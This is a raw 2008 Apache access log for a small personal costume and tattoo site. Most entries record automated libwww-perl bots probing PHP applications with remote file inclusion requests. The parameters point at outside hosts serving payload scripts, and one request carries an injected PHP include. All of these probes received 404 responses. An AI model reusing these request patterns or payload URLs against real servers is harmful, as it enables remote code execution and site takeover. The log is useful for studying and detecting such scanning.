71.240.209.142 - - [25/Jun/2008:23:56:17 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:17 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:17 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:18 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:19 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:19 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:19 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:20 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:20 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
71.240.209.142 - - [25/Jun/2008:23:56:21 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6"
65.55.104.11 - - [25/Jun/2008:23:57:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.104.11 - - [25/Jun/2008:23:57:37 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
82.194.73.130 - - [25/Jun/2008:23:59:03 -0500] "GET /logs/index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
82.194.73.130 - - [25/Jun/2008:23:59:04 -0500] "GET /index.php?ir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
201.55.48.7 - - [26/Jun/2008:00:00:58 -0500] "GET /logs/access_log.1207785600//Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
201.55.48.7 - - [26/Jun/2008:00:00:59 -0500] "GET //Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
201.55.48.7 - - [26/Jun/2008:00:00:59 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://rehab.ru/images/stories/ooid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
61.70.204.99 - - [26/Jun/2008:00:01:18 -0500] "GET /logs//logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.70.204.99 - - [26/Jun/2008:00:01:19 -0500] "GET //logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
61.70.204.99 - - [26/Jun/2008:00:01:19 -0500] "GET /logs//logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
61.70.204.99 - - [26/Jun/2008:00:01:20 -0500] "GET //logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
212.111.204.40 - - [26/Jun/2008:00:03:32 -0500] "GET /logs//com_joomlalib/standalone/stubjambo.php?baseDir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
212.111.204.40 - - [26/Jun/2008:00:03:32 -0500] "GET //com_joomlalib/standalone/stubjambo.php?baseDir=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.101.4.49 - - [26/Jun/2008:00:08:13 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://thepornhandbook.com/templates/id.txt%20? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
87.101.4.49 - - [26/Jun/2008:00:08:15 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://thepornhandbook.com/templates/id.txt%20? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
190.196.2.205 - - [26/Jun/2008:00:10:42 -0500] "GET /logs/oneadmin/calendar/samplecalendar.php?path[docroot]=http://kelayan.us/KelayanBid?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
190.196.2.205 - - [26/Jun/2008:00:10:43 -0500] "GET /oneadmin/calendar/samplecalendar.php?path[docroot]=http://kelayan.us/KelayanBid?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.29.75.39 - - [26/Jun/2008:00:13:37 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:00:13:40 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
81.192.48.40 - - [26/Jun/2008:00:16:12 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
82.194.73.130 - - [26/Jun/2008:00:19:09 -0500] "GET /logs//bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.73.130 - - [26/Jun/2008:00:19:09 -0500] "GET //bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
83.172.138.14 - - [26/Jun/2008:00:20:11 -0500] "GET /logs//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
83.172.138.14 - - [26/Jun/2008:00:20:11 -0500] "GET //content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
74.6.8.113 - - [26/Jun/2008:00:21:09 -0500] "GET /logs/access_log.1155686400 HTTP/1.0" 200 255377 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.170.127.210 - - [26/Jun/2008:00:21:33 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
67.170.127.210 - - [26/Jun/2008:00:21:33 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
67.170.127.210 - - [26/Jun/2008:00:21:33 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
67.170.127.210 - - [26/Jun/2008:00:21:34 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
67.170.127.210 - - [26/Jun/2008:00:21:34 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)"
81.192.48.40 - - [26/Jun/2008:00:23:39 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:00:24:06 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:00:24:12 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
83.172.138.14 - - [26/Jun/2008:00:26:37 -0500] "GET /logs//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
83.172.138.14 - - [26/Jun/2008:00:26:38 -0500] "GET //content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
83.172.138.14 - - [26/Jun/2008:00:27:41 -0500] "GET /logs//content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
83.172.138.14 - - [26/Jun/2008:00:27:42 -0500] "GET //content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
81.192.48.40 - - [26/Jun/2008:00:27:53 -0500] "GET /logs/errors.php?error=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:00:28:01 -0500] "GET /errors.php?error=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.20.85.150 - - [26/Jun/2008:00:29:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
209.62.24.242 - - [26/Jun/2008:00:30:59 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/rastamania/KaBo.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
209.62.24.242 - - [26/Jun/2008:00:30:59 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/rastamania/KaBo.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
82.194.73.130 - - [26/Jun/2008:00:31:09 -0500] "GET /logs//bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.73.130 - - [26/Jun/2008:00:31:09 -0500] "GET //bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
74.6.8.113 - - [26/Jun/2008:00:32:15 -0500] "GET /logs/access_log.1196553600 HTTP/1.0" 200 97822 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.130.79.38 - - [26/Jun/2008:00:33:19 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
201.130.79.38 - - [26/Jun/2008:00:33:19 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
72.29.75.39 - - [26/Jun/2008:00:33:31 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:00:33:31 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:00:33:31 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:00:33:31 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
217.148.95.147 - - [26/Jun/2008:00:34:37 -0500] "GET /logs/mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.76"
217.148.95.147 - - [26/Jun/2008:00:34:38 -0500] "GET /mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.76"
72.29.75.39 - - [26/Jun/2008:00:35:41 -0500] "GET /logs/mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:00:35:41 -0500] "GET /mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.810"
72.29.73.67 - - [26/Jun/2008:00:36:12 -0500] "GET /logs/mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
72.29.73.67 - - [26/Jun/2008:00:36:12 -0500] "GET /mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.810"
70.86.234.234 - - [26/Jun/2008:00:39:05 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/gupicolas/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
70.86.234.234 - - [26/Jun/2008:00:39:05 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/gupicolas/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
81.192.48.40 - - [26/Jun/2008:00:39:24 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:00:39:35 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
217.148.95.147 - - [26/Jun/2008:00:43:48 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.148.95.147 - - [26/Jun/2008:00:43:49 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
81.192.48.40 - - [26/Jun/2008:00:45:18 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
82.194.73.130 - - [26/Jun/2008:00:45:43 -0500] "GET /logs//bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.73.130 - - [26/Jun/2008:00:45:43 -0500] "GET //bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
72.29.73.67 - - [26/Jun/2008:00:46:36 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.73.67 - - [26/Jun/2008:00:46:36 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
200.30.73.117 - - [26/Jun/2008:00:48:56 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/gupicolas/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
200.30.73.117 - - [26/Jun/2008:00:48:56 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/gupicolas/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
200.203.245.7 - - [26/Jun/2008:00:49:23 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/gupicolas/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.203.245.7 - - [26/Jun/2008:00:49:23 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/gupicolas/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.214.45.167 - - [26/Jun/2008:00:51:45 -0500] "GET /tattoo/tatd2.JPG HTTP/1.0" 200 14891 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
213.218.141.5 - - [26/Jun/2008:00:52:26 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/id.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.812"
213.218.141.5 - - [26/Jun/2008:00:52:27 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cilux.coolpage.biz/id.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.812"
82.194.73.130 - - [26/Jun/2008:00:55:16 -0500] "GET /logs//bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
82.194.73.130 - - [26/Jun/2008:00:55:16 -0500] "GET //bemarket//postscript/postscript.php?p_mode=http://www.proyectoindra.com/borda2.jpg? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
67.195.37.168 - - [26/Jun/2008:00:55:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.192.48.40 - - [26/Jun/2008:00:55:48 -0500] "GET /logs/errors.php?error=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:00:56:04 -0500] "GET /errors.php?error=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.18.76 - - [26/Jun/2008:00:56:18 -0500] "GET /logs//login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.18.76 - - [26/Jun/2008:00:56:24 -0500] "GET /logs//login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.18.76 - - [26/Jun/2008:00:56:29 -0500] "GET //login.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.106.18.76 - - [26/Jun/2008:00:56:34 -0500] "GET //login.php?dir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
67.195.37.168 - - [26/Jun/2008:00:58:21 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.254.214.2 - - [26/Jun/2008:00:58:42 -0500] "GET /logs/access_log.1194048000/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 404 362 "-""libwww-perl/5.811"
213.254.214.2 - - [26/Jun/2008:00:58:43 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 404 335 "-""libwww-perl/5.811"
213.254.214.2 - - [26/Jun/2008:00:58:43 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://queb3.info/cruise/tanii?????????????? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
65.214.45.167 - - [26/Jun/2008:00:59:45 -0500] "GET /tattoo/tatc9.JPG HTTP/1.0" 200 18139 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
213.180.84.186 - - [26/Jun/2008:01:01:39 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
213.180.84.186 - - [26/Jun/2008:01:01:40 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://199.238.139.160/images/rox.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.803"
81.192.48.40 - - [26/Jun/2008:01:01:44 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
200.203.122.236 - - [26/Jun/2008:01:01:58 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
200.203.122.236 - - [26/Jun/2008:01:01:59 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://thepornhandbook.com/templates/id.txt%20??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:01:02:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geo-mobile.com/nuke/modules/Forums/images/avatars/.../id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
74.6.8.113 - - [26/Jun/2008:01:04:42 -0500] "GET /costume/index1.htm HTTP/1.0" 200 21563 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.192.48.40 - - [26/Jun/2008:01:05:39 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
81.192.48.40 - - [26/Jun/2008:01:05:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://alaskafamily.net/poll/me.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
72.29.75.39 - - [26/Jun/2008:01:12:16 -0500] "GET /logs/mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 296 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:12:19 -0500] "GET /mcf.php?content=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 291 "-""libwww-perl/5.810"
74.6.16.235 - - [26/Jun/2008:01:13:09 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [26/Jun/2008:01:13:09 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.118.97.213 - - [26/Jun/2008:01:14:59 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
216.118.97.213 - - [26/Jun/2008:01:14:59 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
195.10.6.66 - - [26/Jun/2008:01:19:53 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
195.10.6.66 - - [26/Jun/2008:01:19:53 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.secret-passions.de/modules/Downloads/docs/thumbs/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
213.156.62.144 - - [26/Jun/2008:01:22:01 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
213.156.62.144 - - [26/Jun/2008:01:22:01 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://avast4ever.xpg.com.br/TT?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
72.29.75.39 - - [26/Jun/2008:01:27:31 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:27:31 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:27:34 -0500] "GET /logs//skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
72.29.75.39 - - [26/Jun/2008:01:27:34 -0500] "GET //skin/zero_vote/error.php?dir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
82.194.70.164 - - [26/Jun/2008:01:30:22 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.194.70.164 - - [26/Jun/2008:01:30:23 -0500] "GET //index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.194.70.164 - - [26/Jun/2008:01:31:07 -0500] "GET /logs//index.php?option=com_joomlaxplorer&action=show_error&dir=http://www.hamnation.com//forums/Skin/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
